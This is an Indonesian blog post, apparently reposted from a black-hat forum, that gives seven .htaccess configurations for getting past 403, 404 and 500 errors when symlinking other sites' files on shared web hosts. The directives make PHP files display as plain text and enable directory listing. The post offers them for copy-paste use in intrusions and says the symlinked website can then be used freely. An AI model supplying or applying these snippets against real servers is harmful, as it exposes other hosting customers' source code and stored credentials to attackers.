7 Cara Mudah Bypass Symlink dengan .htaccess

Hallo,man teman
Pada kali ini gw mau sharing tentang cara mudah Bypass Symlink dengan .htaccess
Ga sengaja lagi muter-muter diforum nemu postingan menarik yaudah gw jadiin artikel diblogg.. hehe..

Buat kalian pasti udah pernah ngalamin saat melakukan symlink udah dapet banyak tapi kok ada masalah, kek misal internal server error, not found, forbidden, dll duh rasanya ngenes mau ditinggalin tapi kok gimana gitu ya.. :v

Oke dari pada kelamaan, yuk langsung saja ke tutorialnya.
Berikut 7 codenya nya.. antara lain :

1. Bypass Symlink 403
    Options all
    DirectoryIndex fuck.html
    AddType text/plain .php
    AddHandler server-parsed .php
    AddType text/plain .html
    AddHandler txt .html
    Require None
    Satisfy Any


2. Bypass Symlink 500

    Options Indexes FollowSymLinks
    DirectoryIndex fuck.htm
    AddType txt .php
    AddHandler txt .php


3. Bypass Symlink 404

    ReadmeName fuck.txt

4. Bypass Symlink 404, 403

    Options Indexes FollowSymLinks
    ReadmeName fuck.txt


5. Bypass Symlink LiteSpeed (symlink to .shtml)
    Options +FollowSymLinks
    DirectoryIndex fuck.html
    RemoveHandler .php
    AddType application/octet-stream .php


6. Bypass Symlink OVH
    Options +FollowSymLinks
    DirectoryIndex fuck.html
    Options +Indexes
    AddType text/plain .php
    AddHandler server-parsed .php


7. Bypass Symlink with Perl
    OPTIONS Indexes Includes
    ExecCGI FollowSymLinks
    AddHandler txt .php
    Options All


Cukup copy codenya aja, habis itu edit .htaccessnya dan jangan lupa pastekan codenya.
Kelarr dahh habis itu mau diapain tuh website symlinkmu bebas.. :v

Cukup copy codenya aja gan, habis itu edit .htaccessnya dan jangan lupa pastekan codenya.
Kelarr dahh habis itu mau diapain tuh website symlinkmu bebas.. :v

Oke mungkin cukup segini dulu ya gan..semoga bermanfaat.

Source: forum surabayablackhat

Tag :
All Bypass Symlink
Bypass Symlink
How to Bypass symlink not found
Symlink Error

0 Response to "7 Cara Mudah Bypass Symlink dengan .htaccess"

Post a Comment

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel